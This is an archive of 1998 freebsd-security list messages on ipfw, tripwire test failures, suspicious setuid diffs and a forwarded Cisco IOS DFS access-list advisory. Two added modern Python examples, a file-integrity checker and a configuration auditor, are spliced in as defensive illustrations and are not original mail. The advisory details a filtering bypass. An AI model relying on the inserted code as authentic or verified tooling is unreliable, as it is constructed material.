From: Archie Cobbs Message-Id: <199811060344.TAA20295@bubba.whistle.com> Subject: Re: Amazing wonder packet Part 2. In-Reply-To: from Robert Watson at "Nov 5, 98 10:42:10 am" To: robert+freebsd@cyrus.watson.org Date: Thu, 5 Nov 1998 19:44:38 -0800 (PST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson writes: > I also raised the question: are packets ever queued after acceptance by > ipfw such that they could be received later if the port is not yet bound? > For example, suppose ipfw in a nascent or under-developed state accepts a > packet, and then later named is started -- is it possible through any race > conditions that the packet accepted earlier will make it to named later? Unless you are using divert(4) rules, etc, all ipfw rules apply "atomically" to each packet... there's no possibility of adding/removing rules and applying of rules intersecting (reason: splnet()). Also, ipfw does not hold on to any packets. The only possible exception is a fragmented packet.. you could get one fragment, then change a rule, then get another.. -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. 
* http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 19:57:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA12602 for freebsd-security-outgoing; Thu, 5 Nov 1998 19:57:52 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from postbox.acs.ohio-state.edu (postbox.acs.ohio-state.edu [128.146.214.20]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA12597; Thu, 5 Nov 1998 19:57:50 -0800 (PST) (envelope-from aschool@postbox.acs.ohio-state.edu) Received: from localhost by postbox.acs.ohio-state.edu (8.9.1a/8.9.1) with SMTP id WAA13567; Thu, 5 Nov 1998 22:57:39 -0500 (EST) Date: Thu, 5 Nov 1998 22:57:38 -0500 (EST) From: Albert School X-Sender: aschool@postbox To: security-notifications@FreeBSD.ORG cc: freebsd-security@FreeBSD.ORG Subject: subscribe Message-ID: X-Loop: aschool@postbox.acs.ohio-state.edu MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 22:44:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA23991 for freebsd-security-outgoing; Thu, 5 Nov 1998 22:44:47 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from pn.wagsky.com (wagsky.vip.best.com [206.86.71.127]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA23978 for ; Thu, 5 Nov 1998 22:44:44 -0800 (PST) (envelope-from root@wagsky.com) Received: from localhost (root@localhost) by pn.wagsky.com (8.8.8/8.8.8) with SMTP id WAA18392 for ; Thu, 5 Nov 1998 22:44:11 -0800 (PST) (envelope-from root@wagsky.com) Date: Thu, 5 Nov 1998 22:44:11 -0800 (PST) 
From: Jeff Kletsky To: freebsd-security@FreeBSD.ORG Subject: tripwire fails 'make test' Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Under STABLE-2.2.7, after a successful make and make install (under single-user mode) tripwire fails to properly execute its own testing (under either multi- or single-user mode). Is this indicative of a problem which needs to be resolved?

Thanks!

Jeff

root@larry:/usr/ports/security/tripwire/work/tripwire-1.2# make test
(cd aux; make CC=cc CFLAGS="-O" LDFLAGS="-static" CPP="cc -E" SHELL=/bin/sh all)
(cd src; make CC=cc CFLAGS="-O" LIBS="" LDFLAGS="-static" CPP="cc -E" SHELL=/bin/sh YACC="yacc" LEX="lex" all)
(cd tests; make HOSTNAME="hostname" DIST=tripwire-1.2 SHELL=/bin/sh CC=cc)
=== test.twpre.sh: DESCRIPTION
This script excercises the Tripwire preprocessor, testing correctness variable expansion and include files.
=== test.twpre.sh: BEGIN ===
=== test.twpre.sh: PASS ===
=== test.update.sh: DESCRIPTION
This shell script exercises all the Tripwire integrity checking and database update functionalities.
=== test.update.sh: Setting up auxiliary scripts ===
=== test.update.sh: BEGIN ===
../src/tripwire -loosedir -c /tmp/twtest/tw.config -d /tmp/twtest/tw.db -i all
=== test.update.sh: testing GROWING (safe) files ===
=== test.update.sh: testing GROWING (unsafe) files ===
=== test.update.sh: testing ADDED files ===
=== test.update.sh: testing DELETED files ===
=== test.update.sh: testing CHANGED files ===
=== test.update.sh: test FAILED! (expecting 8, got 0) ===
=== (/tmp/TWLOG contains output from test script and Tripwire) ===
*** Error code 1
Stop.
*** Error code 1
Stop.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 01:54:42 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA09737 for freebsd-security-outgoing; Fri, 6 Nov 1998 01:54:42 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from heidegger.uol.com.br (smtp.uol.com.br [200.230.198.76]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA09731 for ; Fri, 6 Nov 1998 01:54:23 -0800 (PST) (envelope-from agora@agoractvm.com.br) Received: from agoractvm.com.br (rjo-1-as03-7-a49.gd.uol.com.br [200.224.131.177]) by heidegger.uol.com.br (8.9.1/8.9.1) with ESMTP id PAA25370; Wed, 4 Nov 1998 15:59:34 -0200 (EDT) Message-ID: <364094A7.E1CD7017@agoractvm.com.br> Date: Wed, 04 Nov 1998 15:53:43 -0200 
From: Teleinformática Reply-To: agora@uol.com.br Organization: ÁGORA C.T.V.M. S/A X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Mark Murray CC: "Jordan K. Hubbard" , agora@uol.com.br, FreeBSD Security , Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: Re: [Fwd: SSHD Exploit] References: <5769.910193185@time.cdrom.com> <199811041749.TAA00172@gratis.grondar.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I agree, but it was not my purpose, I posted this msg only for information... :-)

Mark Murray wrote:
> "Jordan K. Hubbard" wrote:
> > Bah. *More* rumors without proof. "I will not post this exploit.."
>
> My sentiments exactly.
>
> M
> --
> Mark Murray
> Join the anti-SPAM movement: http://www.cauce.org

--
Regards,

 _______________________
| Nelson 'Stderr' Brito |_________________________________
|_________________________________________________________|
|Finger Print: | A2E0 D90E 413A 515A 10C9 C0CE 4855 D523 |
| E-mail:      | nelson@cyberspace.org                    |
| URL:         | http://www.angelfire.com/sd/stderr       |
| Public key:  | See the URL                              |
|______________|__________________________________________|
|ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo|
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Nov 6 04:07:02 1998 Return-Path: Received: (from
majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA21360 for freebsd-security-outgoing; Fri, 6 Nov 1998 04:07:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA21355 for ; Fri, 6 Nov 1998 04:06:59 -0800 (PST) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA01364; Fri, 6 Nov 1998 09:06:25 -0300 (GMT) 
From: Fernando Schapachnik Message-Id: <199811061206.JAA01364@ns1.sminter.com.ar> Subject: Re: tripwire fails 'make test' In-Reply-To: from Jeff Kletsky at "Nov 5, 98 10:44:11 pm" To: root@wagsky.com (Jeff Kletsky) Date: Fri, 6 Nov 1998 09:06:25 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

The same happened to me, even on a Sun.

Regards.

In an earlier message, Jeff Kletsky wrote:
> Under STABLE-2.2.7, after a successful make and make install
> (under single-user mode) tripwire fails to properly execute its own
> testing (under either multi- or single-user mode). Is this indicative of
> a problem which needs to be resolved?
[...]

Fernando P. Schapachnik
Network Administration
S&M International SA

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Nov 6 05:18:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA28530 for freebsd-security-outgoing; Fri, 6 Nov 1998 05:18:03 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from easeway.com (ns1.easeway.com [209.69.71.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA28479 for ; Fri, 6 Nov 1998 05:18:00 -0800 (PST) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.7/8.8.5) id HAA22049 for freebsd-security@freebsd.org; Fri, 6 Nov 1998 07:58:31 -0500 (EST) Message-Id: <199811061258.HAA22049@easeway.com> Subject: *huge* setuid diffs To: freebsd-security@FreeBSD.ORG Date: Fri, 6 Nov 1998 07:58:31 -0500 (EST)
From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Folks, I just got /etc/security mail from two 2.2.6 servers I administer. The setuid diffs list every setuid program on the server as having been removed and replaced. We haven't done a make world. We haven't touched much of anything. Is this normal, or should I be worried? Both are running a very recent apache 1.2, sshd, ftpd. One is running apache-SSL, the other runs named and Merit radiusd. Thanks, Michael -- Michael Lucas | Exceptionet, Inc. | www.exceptionet.com "Exceptional Networking" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 06:18:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA03774 for freebsd-security-outgoing; Fri, 6 Nov 1998 06:18:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from enterprise.sl.ru (enterprise.sl.ru [195.16.101.4] (may be forged)) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA03766 for ; Fri, 6 Nov 1998 06:18:17 -0800 (PST) (envelope-from tarkhil@synchroline.ru) Received: from enterprise.sl.ru (tarkhil@localhost.synchroline.ru [127.0.0.1]) by enterprise.sl.ru (8.9.1a/8.8.8) with ESMTP id RAA01848; Fri, 6 Nov 1998 17:19:14 +0300 (MSK) (envelope-from tarkhil@enterprise.sl.ru) Message-Id: <199811061419.RAA01848@enterprise.sl.ru> X-Mailer: exmh version 2.0.2 2/24/98 To: mwlucas@exceptionet.com cc: freebsd-security@FreeBSD.ORG Subject: Re: *huge* setuid diffs In-reply-to: Your message "Fri, 06 Nov 1998 07:58:31 EST." <199811061258.HAA22049@easeway.com> Reply-To: tarkhil@synchroline.ru X-URL: http://freebsd.svib.ru Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Nov 1998 17:19:13 +0300 
From: "Alexander B. Povolotsky" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

<199811061258.HAA22049@easeway.com>mwlucas@exceptionet.com writes:
>I just got /etc/security mail from two 2.2.6 servers I administer. The
>setuid diffs list every setuid program on the server as having been removed
>and replaced.
>
>We haven't done a make world. We haven't touched much of anything.
>
>Is this normal, or should I be worried?

*IMMEDIATELY* shut down both servers and do not bring them back onto the Internet until you have found the reason. It is *QUITE* abnormal. I would not call it an "exploit", but it is something to understand at once.

Alex.
--
Alexander B. Povolotsky, System Administrator

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Nov 6 07:04:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA08427 for freebsd-security-outgoing; Fri, 6 Nov 1998 07:04:57 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA08422 for ; Fri, 6 Nov 1998 07:04:53 -0800 (PST) (envelope-from ark@eltex.ru)
From: ark@eltex.ru Received: from eltex.ru (eltex-spiiras.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id SAA01742; Fri, 6 Nov 1998 18:04:30 +0300 (MSK) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id SAA28772; Fri, 6 Nov 1998 18:04:31 +0300 (MSK) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 6 Nov 1998 18:04:00 +0300 Received: from undisclosed-intranet-sender id xma015064; Fri, 6 Nov 98 18:03:52 +0300 Date: Fri, 6 Nov 1998 18:08:51 +0300 Message-Id: <199811061508.SAA18398@paranoid.eltex.spb.ru> In-Reply-To: <199811061258.HAA22049@easeway.com> from "mwlucas@exceptionet.com" Organization: "Klingon Imperial Intelligence Service" Subject: Re: *huge* setuid diffs To: mwlucas@exceptionet.com Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

nuqneH,

Check whether your /var filesystem is out of space. If it is, the script cannot create one of the files required for diff and you get this kind of diagnostic.

mwlucas@exceptionet.com said :
> Folks,
>
> I just got /etc/security mail from two 2.2.6 servers I administer. The
> setuid diffs list every setuid program on the server as having been removed
> and replaced.
>
> We haven't done a make world. We haven't touched much of anything.
>
> Is this normal, or should I be worried?
>
> Both are running a very recent apache 1.2, sshd, ftpd. One is running
> apache-SSL, the other runs named and Merit radiusd.

 _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one!
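Added example (my own, not FreeBSD's /etc/security script or tripwire's code) serving both Jeff's tripwire ADDED/DELETED/CHANGED test output above and the failure mode ark describes here: a listing file that could not be written completely is refused, instead of being diffed and reporting every setuid program as removed and replaced. The snapshot format, trailer marker, file names and sample tree are assumptions of this example.

```python
"""Tripwire-style integrity check whose snapshot file fails closed.

Added example, not FreeBSD's /etc/security script or the tripwire sources.
A snapshot not written completely (e.g. /var out of space) is rejected
instead of diffed: an empty "today" listing diffed against a full
"yesterday" one reports every setuid program as removed and replaced.
Layout, trailer marker and sample tree are this example's assumptions."""
import hashlib
import json
import os
import stat
import tempfile

TRAILER = "__complete__"  # assumed marker: entry count, proves a full write


def snapshot(root):
    """Record mode, size, sha256 and a setuid flag for every regular file."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets etc. are not inventoried
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            snap[os.path.relpath(path, root)] = {
                "mode": stat.S_IMODE(st.st_mode), "size": st.st_size,
                "sha256": digest, "setuid": bool(st.st_mode & stat.S_ISUID)}
    return snap


def save_snapshot(snap, filename):
    """Write the entries plus a trailer carrying the entry count."""
    with open(filename, "w") as fh:
        json.dump({"entries": snap, TRAILER: len(snap)}, fh)


def load_snapshot(filename):
    """Fail closed: a truncated or trailer-less file raises, never reads as empty."""
    with open(filename) as fh:
        raw = fh.read()
    try:
        data = json.loads(raw)
    except ValueError as exc:
        raise RuntimeError("snapshot %s is truncated or corrupt" % filename) from exc
    if data.get(TRAILER) != len(data.get("entries", {})):
        raise RuntimeError("snapshot %s was not written completely" % filename)
    return data["entries"]


def compare(baseline, current):
    """Classify paths as tripwire's test script does (ADDED, DELETED, CHANGED)
    and, as /etc/security does, list setuid programs that appeared or vanished."""
    old, new = set(baseline), set(current)
    old_suid = {p for p in old if baseline[p]["setuid"]}
    new_suid = {p for p in new if current[p]["setuid"]}
    return {"added": sorted(new - old), "deleted": sorted(old - new),
            "changed": sorted(p for p in old & new if baseline[p] != current[p]),
            "setuid_added": sorted(new_suid - old_suid),
            "setuid_removed": sorted(old_suid - new_suid)}


def _put(root, rel, body, mode=0o644):
    """Create or replace a file in the constructed sample tree."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(body)
    os.chmod(path, mode)


def run_scenario():
    """Constructed scenario: baseline, then add/replace/delete files, then a
    snapshot file cut short (standing in for a write that hit a full /var)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "root")
        _put(root, "bin/su", b"su v1", 0o4755)  # setuid binary in the baseline
        _put(root, "etc/motd", b"hello")
        yesterday = os.path.join(tmp, "setuid.yesterday.json")
        save_snapshot(snapshot(root), yesterday)
        # Day two: su is replaced and loses setuid, motd vanishes, a tool appears.
        _put(root, "bin/su", b"su v2 (replaced)", 0o755)
        os.remove(os.path.join(root, "etc/motd"))
        _put(root, "bin/newtool", b"new", 0o755)
        today = os.path.join(tmp, "setuid.today.json")
        save_snapshot(snapshot(root), today)
        report = compare(load_snapshot(yesterday), load_snapshot(today))
        # Simulate the short write and confirm the loader refuses the file.
        with open(today, "r+") as fh:
            fh.truncate(os.path.getsize(today) // 2)
        try:
            load_snapshot(today)
            truncated_rejected = False
        except RuntimeError:
            truncated_rejected = True
    return report, truncated_rejected
```

Calling run_scenario() returns the classification for the constructed tree together with a flag confirming that the half-written snapshot was refused rather than diffed.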
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Nov 6 07:25:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA10452 for freebsd-security-outgoing; Fri, 6 Nov 1998 07:25:26 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from heidegger.uol.com.br (heidegger.uol.com.br [200.230.198.88]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA10401 for ; Fri, 6 Nov 1998 07:24:52 -0800 (PST) (envelope-from agora@agoractvm.com.br) Received: from agoractvm.com.br ([200.255.48.220]) by heidegger.uol.com.br (8.9.1/8.9.1) with ESMTP id IAA16344; Fri, 6 Nov 1998 08:55:45 -0200 (EDT) Message-ID: <3642D460.9205ECA2@agoractvm.com.br> Date: Fri, 06 Nov 1998 08:50:08 -0200
From: Teleinformática Reply-To: agora@uol.com.br Organization: ÁGORA C.T.V.M. S/A X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Best of Security CC: Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" , FreeBSD Security Subject: [Fwd: CERT Vendor-Initiated Bulletin VB-98.13 - Cisco_IOS_DFS] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Received: by pascal (mbox agora) (with Cubic Circle's cucipop (v1.22 1998/04/11) Fri Nov 6 08:39:33 1998) X-From_: root Fri Nov 6 03:25:42 1998 Received: from coal.cert.org (coal.cert.org [192.88.210.31]) by pascal.uol.com.br (8.9.1/8.9.1) with SMTP id DAA23159; Fri, 6 Nov 1998 03:25:23 -0200 (EDT) Received: (from cert-advisory@localhost) by coal.cert.org (8.6.12/CERT) id QAA25000 for cert-advisory-queue-4; Thu, 5 Nov 1998 16:14:16 -0500 Date: Thu, 5 Nov 1998 16:14:16 -0500 Message-Id: <199811052114.QAA25000@coal.cert.org>
From: CERT Bulletin To: cert-advisory@coal.cert.org Subject: CERT Vendor-Initiated Bulletin VB-98.13 - Cisco_IOS_DFS Reply-To: cert-advisory-request@cert.org Organization: CERT(sm) Coordination Center - +1 412-268-7090 X-Mozilla-Status2: 00000000 -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= CERT* Vendor-Initiated Bulletin VB-98.13 November 5, 1998 Topic: Cisco IOS DFS Access List Leakage Source: Cisco To aid in the wide distribution of essential security information, the CERT Coordination Center is forwarding the following information from Cisco. Cisco urges you to act on this information as soon as possible. Cisco contact information is included in the forwarded text below; please contact them if you have any questions or need further information. =======================FORWARDED TEXT STARTS HERE============================ - -----BEGIN PGP SIGNED MESSAGE----- Field Notice: Cisco IOS DFS Access List Leakage ================================================================= Revision 1.2 For release 08:00 AM US/Pacific, Thursday, November 5, 1998 Cisco internal use only until release date. Summary ======= Errors in certain Cisco IOS software versions for certain routers can cause IP datagrams to be output to network interfaces even though access lists have been applied to filter those datagrams. This applies to routers from the Cisco 7xxx family only, and only when those routers have been configured for distributed fast switching (DFS). There are two independent vulnerabilities, which have been given Cisco bug IDs CSCdk35564 and CSCdk43862. Each vulnerability affects only a specialized subset of DFS configurations. Affected configurations are not believed to be extremely common, but neither are they extremely rare. More details of affected configurations are in the "Who is Affected" section of this document. 
These vulnerabilities may permit users to send packets to parts of the customer's network for which they are not authorized. This may permit unauthorized access or other attacks on customer computer systems or data. Cisco does not know of any incidents in which these vulnerabilities have actually been exploited by attackers.

Neither vulnerability affects any Cisco product other than routers in the 70xx, 72xx or 75xx series. Of 70xx routers, only routers with the optional route-switch processor (RSP) card are affected. Additional configuration conditions apply.

Who is Affected
===============

These vulnerabilities apply only to the Cisco 7xxx router family. The Cisco 7xxx family are large, rack-mounted backbone routers used primarily by Internet service providers and in large enterprise networks. Cisco 75xx routers are affected by both vulnerabilities. Cisco 72xx routers are affected only by CSCdk35564, and not by CSCdk43862. Cisco 70xx routers are affected only if they have RSP cards installed.

Although each of the vulnerabilities is different and manifests itself under different conditions, both involve DFS. DFS is not enabled by default in any Cisco product, and must be manually configured. If the command "ip route-cache distributed" does not appear in your router configuration file, then you are not affected by either vulnerability. Specifically, process switching (no ip route-cache), ordinary fast switching (ip route-cache), optimum switching (ip route-cache optimum), and CEF or dCEF switching (ip route-cache cef, ip cef distributed switch) are not affected. Flow switching is considered a form of fast switching, and is affected only in distributed mode. Interactions between flow switching and access lists reduce, but do not eliminate, the impact of both vulnerabilities when flow switching is enabled along with DFS.

CSCdk35564 affected configurations
----------------------------------

CSCdk35564 is a defect in the 11.1CC and 11.1CT releases.
Routers running Cisco IOS software versions other than 11.1CC and 11.1CT are not affected by CSCdk35564. Cisco 72xx and 75xx routers are affected; Cisco 70xx routers are not supported with the affected hardware/software combinations.

To be affected by CSCdk35564, your router must be configured to switch traffic from an interface with DFS enabled to an interface without DFS enabled. This most commonly happens when routers contain both versatile interface processor (VIP) interface cards and non-VIP interface cards. Since DFS is supported only on VIP interfaces, traffic from a VIP to a non-VIP interface may be going from DFS to non-DFS.

If DFS is enabled on all of the interfaces in your router, then you are not affected by CSCdk35564. If DFS is not enabled on any interface in your router, then you are not affected. If you do not use the "ip access-group" command to filter outgoing traffic on any non-DFS interfaces, then you are not affected.

CSCdk43862 affected configurations
----------------------------------

CSCdk43862 affects 11.1, 11.2, and 11.3 versions of Cisco IOS software on the Cisco 70xx and 75xx series; see the table later in this document for details. The Cisco 72xx series is not affected by CSCdk43862, regardless of the software version in use.

To be vulnerable, your router must be configured to switch traffic from an input interface with DFS enabled to a logical subinterface of a physical output interface. The output interface may or may not have DFS enabled; the important question for the output interface is whether or not subinterfaces are in use, and whether or not output traffic to subinterfaces is being filtered.

Subinterfaces are pseudo-interfaces associated with subsets of the traffic on physical interfaces. For instance, a physical Frame Relay interface might have a subinterface associated with each Frame Relay PVC. Subinterfaces do not exist by default; they are created as part of user configuration.
Subinterface numbers always contain periods, as in "Serial 0/1.1". If your configuration file does not contain any such "dotted" interface numbers, then you are not vulnerable. If you do not use the "ip access-group" command to apply output access-list filtering to subinterfaces, then you are not vulnerable.

CSCdk43862 causes the access list applied to one subinterface on a physical interface to be incorrectly used for traffic destined for a different subinterface. If you use the same access list to filter outbound traffic on all subinterfaces of any given physical interface, then you are not vulnerable.

Impact
======

Incorrect access-list filtering may be applied to output packets. Output access lists are frequently used to implement security filtering, and the failure of such access lists may permit users to send packets to parts of the network for which they are not authorized. This, in turn, may permit them to bypass security restrictions, and to gain access to data or resources from which they should be excluded.

Neither of the defects described in this notice "fails reliably". The same access lists, on the same interfaces, may work correctly at some times, and fail at other times. Because of this, administrators who test their access lists may be misled into believing that the access lists are providing effective protection, when in fact they are not.

CSCdk43862 may result in legitimate traffic being filtered out, as well as in undesired traffic being permitted to pass through the router. CSCdk35564 never filters legitimate traffic; it only permits undesired traffic.

An attacker who had detailed knowledge of these vulnerabilities might be able to create conditions favorable to unauthorized access being permitted. However, such activity would probably be unnecessary; even without deliberate intervention by an attacker, such conditions would be expected to occur frequently during the operation of most affected networks.
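The "Who is Affected" conditions above can be checked mechanically against a saved configuration. The following is an added example, not Cisco's or CERT's code: it parses a constructed IOS configuration and flags the two patterns the notice describes, an outbound access-group on a non-DFS interface while DFS is enabled elsewhere (CSCdk35564) and subinterfaces of one physical interface filtered with different outbound access lists (CSCdk43862). It assumes subinterfaces take DFS from their physical interface, and it does not check platform or IOS version, which the notice's table still governs.

```python
"""Flag the two DFS access-list conditions from Cisco's field notice.

Added example, not Cisco's or CERT's code. It applies only the configuration
tests in the "Who is Affected" section (CSCdk35564 and CSCdk43862); the
platform and IOS-version conditions are left to the operator.
"""
import re
from collections import defaultdict

# Matches "interface Serial2/0.1 point-to-point" and the notice's "Serial 0/1.1"
INTERFACE_RE = re.compile(r"^interface\s+(\S+(?:\s+\d\S*)?)", re.IGNORECASE)
DFS_RE = re.compile(r"^\s*ip route-cache distributed\b", re.IGNORECASE)
ACL_OUT_RE = re.compile(r"^\s*ip access-group\s+(\S+)\s+out\b", re.IGNORECASE)


def parse_interfaces(config_text):
    """Return {name: {"dfs": bool, "acl_out": str or None}} per interface.

    Only the two commands the notice turns on are tracked. "no ip route-cache
    distributed" does not match DFS_RE, so it reads as DFS off. An unindented
    line ends the current interface block, as in IOS configuration files.
    """
    interfaces = {}
    current = None
    for raw in config_text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("!"):
            continue
        m = INTERFACE_RE.match(line)
        if m:
            current = m.group(1).replace(" ", "")
            interfaces[current] = {"dfs": False, "acl_out": None}
            continue
        if not line.startswith(" "):
            current = None
            continue
        if current is None:
            continue
        if DFS_RE.match(line):
            interfaces[current]["dfs"] = True
        m = ACL_OUT_RE.match(line)
        if m:
            interfaces[current]["acl_out"] = m.group(1)
    return interfaces


def audit(config_text):
    """Return a list of (bug_id, interface, reason) for exposed configurations."""
    ifaces = parse_interfaces(config_text)
    findings = []
    # No "ip route-cache distributed" anywhere: neither defect applies.
    if not any(v["dfs"] for v in ifaces.values()):
        return findings
    # CSCdk35564: a DFS input interface may forward to a non-DFS output
    # interface whose outbound access list is then not applied reliably.
    # Assumption: only physical (undotted) interfaces carry the DFS setting.
    for name, v in ifaces.items():
        if "." not in name and not v["dfs"] and v["acl_out"]:
            findings.append(("CSCdk35564", name,
                             "outbound access-group %s on a non-DFS interface "
                             "while DFS is enabled elsewhere" % v["acl_out"]))
    # CSCdk43862: subinterfaces of one physical interface use different
    # outbound access lists (an unfiltered subinterface counts as different).
    subs_by_physical = defaultdict(dict)
    for name, v in ifaces.items():
        if "." in name:
            subs_by_physical[name.split(".", 1)[0]][name] = v["acl_out"]
    for physical, subs in sorted(subs_by_physical.items()):
        acls = set(subs.values())
        if len(acls) > 1 and any(a is not None for a in acls):
            detail = ", ".join("%s=%s" % (s, a or "none") for s, a in sorted(subs.items()))
            findings.append(("CSCdk43862", physical,
                             "subinterfaces filtered with differing outbound "
                             "access lists: " + detail))
    return findings


# Constructed sample configuration, not taken from any real router.
SAMPLE_CONFIG = """\
! constructed sample, not a real router configuration
hostname border-7507
!
interface FastEthernet0/0
 ip route-cache distributed
!
interface Ethernet1/0
 ip access-group 110 out
!
interface Serial2/0
 encapsulation frame-relay
 ip route-cache distributed
!
interface Serial2/0.1 point-to-point
 ip access-group 120 out
!
interface Serial2/0.2 point-to-point
 ip access-group 130 out
!
interface Serial2/1
 ip route-cache distributed
!
interface Serial2/1.1 point-to-point
 ip access-group 120 out
!
interface Serial2/1.2 point-to-point
 ip access-group 120 out
"""

if __name__ == "__main__":
    for bug, iface, reason in audit(SAMPLE_CONFIG):
        print("%s %-12s %s" % (bug, iface, reason))
```

Applying the notice's workaround (replacing every "ip route-cache distributed" with "no ip route-cache distributed") makes the audit report nothing, since neither defect applies without DFS.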
Workarounds
===========

These vulnerabilities can be worked around by disabling DFS on network interfaces (with "no ip route-cache distributed"). Be aware that the purpose of DFS is to transfer computational load from the router's primary CPU to the CPUs on the VIP cards, and that disabling DFS may therefore cause overload of the primary CPU. Evaluate your traffic load and CPU usage before using this workaround.

